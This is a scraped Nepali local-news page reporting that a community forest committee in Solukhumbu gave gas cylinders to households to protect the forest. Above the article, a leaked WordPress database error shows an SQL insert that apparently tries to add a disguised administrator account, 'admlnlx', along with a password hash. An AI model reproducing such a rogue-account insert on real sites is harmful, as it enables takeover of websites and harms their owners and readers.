WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKrh4Fyv76oozppHqXfuZt3R9xYdnt0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:33:50', '', 'admlnlx', 'admlnlx')

मोपुङ सामुदायिक द्वारा वन संरक्षणका लागि ग्यास वितरण – Gaule Khabar

मोपुङ सामुदायिक द्वारा वन संरक्षणका लागि ग्यास वितरण

मोपुङ सामुदायिक द्वारा वन संरक्षणका लागि ग्यास वितरण

गाउँले न्यूज, ३ माघ, सोलुखुम्बु । मोपुङ सामुदायिक वन उपभोक्ता समिति सोलुखुम्बुले सामुदायिक वन संरक्षणका लागि उपभोक्तालाई ग्यास वितरण गरेको छ । सोलुदुधकुण्ड नगरपालिका २ मा रहेको यस सामुदायिक वन उपभोक्ता समितिले वन संरक्षको प्रमुख उद्देश्यसहित उपभोक्तालाई बुधबार ग्यास सिलिन्डर वितरण गरेको हो ।

मोपुङ सामुदायिक वन उपभोक्ता समितिले समितिका ४६ घरधुरी उपभोक्तालाई ग्यास वितरण गर्ने लक्ष्य अनुरुप बुधबार ४० घरधुरीलाई सोलुदुधकुण्ड नगरपालिकाका प्रमुख नाम्गेल जाङबु शेर्पा, वडा न. २ का अध्यक्ष मिङमार शेर्पा, सामुदायिक वन उपभोक्ता समितिका पदाधिकारी र स्थानीयको उपस्थितिमा ग्यास वितरण गरेको छ ।

वडालाई धुवाँ मुक्त बनाउन र वन जङ्गल संरक्षणका लागि सामुदायिक वन उपभोक्ता समितिले खेलेको भूमिका सह्रानीय रहेको साथै यस कार्यले प्रदुषण नियन्त्रणमा समेत महत्वपूर्ण सघाउ पुर्‍यउने सोलुदुधकुण्ड नगरपालिकाका प्रमुख शेर्पाले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका